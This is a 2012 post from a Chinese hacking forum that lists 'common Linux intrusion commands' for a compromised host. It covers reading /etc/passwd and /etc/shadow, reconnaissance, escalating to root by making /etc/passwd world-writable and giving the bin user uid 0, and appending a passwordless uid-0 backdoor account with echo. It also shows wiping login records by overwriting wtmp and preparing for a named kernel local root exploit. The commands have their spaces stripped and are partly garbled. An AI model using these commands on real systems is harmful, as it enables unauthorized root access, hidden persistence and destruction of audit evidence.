linux入侵常用命令

[复制链接]
查看322 | 回复0 | 2012-4-1 19:16:37 | 显示全部楼层 |阅读模式
cat/etc/passwd查看linux用户
cat/etc/shadow查看用户密码需要root权限
cat/etc/sysconfig/network-scripts/ifcfg-ethnN代表网卡号查看所在网卡的ip信息
ifconfig查看本机ip信息
cat/etc/resolv.conf查看DNS信息
bash-i在反弹的shell中使用可以直观显示命令
bashprompt:当你以普通限权用户身份进入的时候,一般你会有一个类似bash$的prompt。当你以

Root登陆时,你的prompt会变成
bash#。

系统变量:试着echo"$USER/$EUID"系统应该会告诉你它认为你是什么用户。
echo1>/proc/sys/net/ipv4/if_forward是不是你写错了,应该是echo1>/proc/sys/net/ipv4/ip_forward,
vim/proc/sys/net/ipv4/ip_forward吧,默认是0,也就是内核不进行数据*滤,改为1,让内核对数据包进行filter处理!
netstat-an|grepLISTEN|grep:80查看端口
service--status-all|greprunning
service--status-all|grephttp

查看运行服务
lsb_release-a查看系统版本
重启ssh服务:/usr/sbin/sshdstop

/

usr/sbin/sshdstart

ssd_config文件里

PasswordAuthenticationno,

将其改为

PasswordAuthenticationyes

远程ssh才可登录

否则显示Accessdenied
其中Usepamyes可能用来建立pam方式login,比如从其它linux主机ssh到服务端,如果关闭,则不能打开.
su的菜鸟用法

先chomod777/etc/passwd

然后修改bin用户的gid和uid为0

然后passwd设置bin的密码

然后cp/bin/bash/sbin/nologin

然后su的时候su-bin就可以到rootshell了。

这个原理就是当ssh不允许root用ssh终端登陆的时候,我们又不知道root密码,的一种很菜鸟的做法

还可以这样

sed-is/bin:x:1:1/bin:x:0:1/g/etc/passwd
g*rtcl2.c–olocal–static–Wall
echo"nosec:x:0:0::/:/bin/sh">>/etc/passwd

echo"nosec::-1:-1:-1:-1:-1:-1:500">>/etc/shadow
清空last记录cp/dev/null/var/log/wtmp

-----

ddif=/dev/zeroof=yourfilebs=10Mcount=10建立一个100m的大文件在利用LinuxKernel<=2.6.17.4(proc)LocalRootExploit提权的时候要用到的

转载请注明出自暗组信息安全论坛http://forum.darkst.com/,本贴地址:http://forum.darkst.com/viewthread.php?tid=45960
&nbsp;
&nbsp;
*
*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则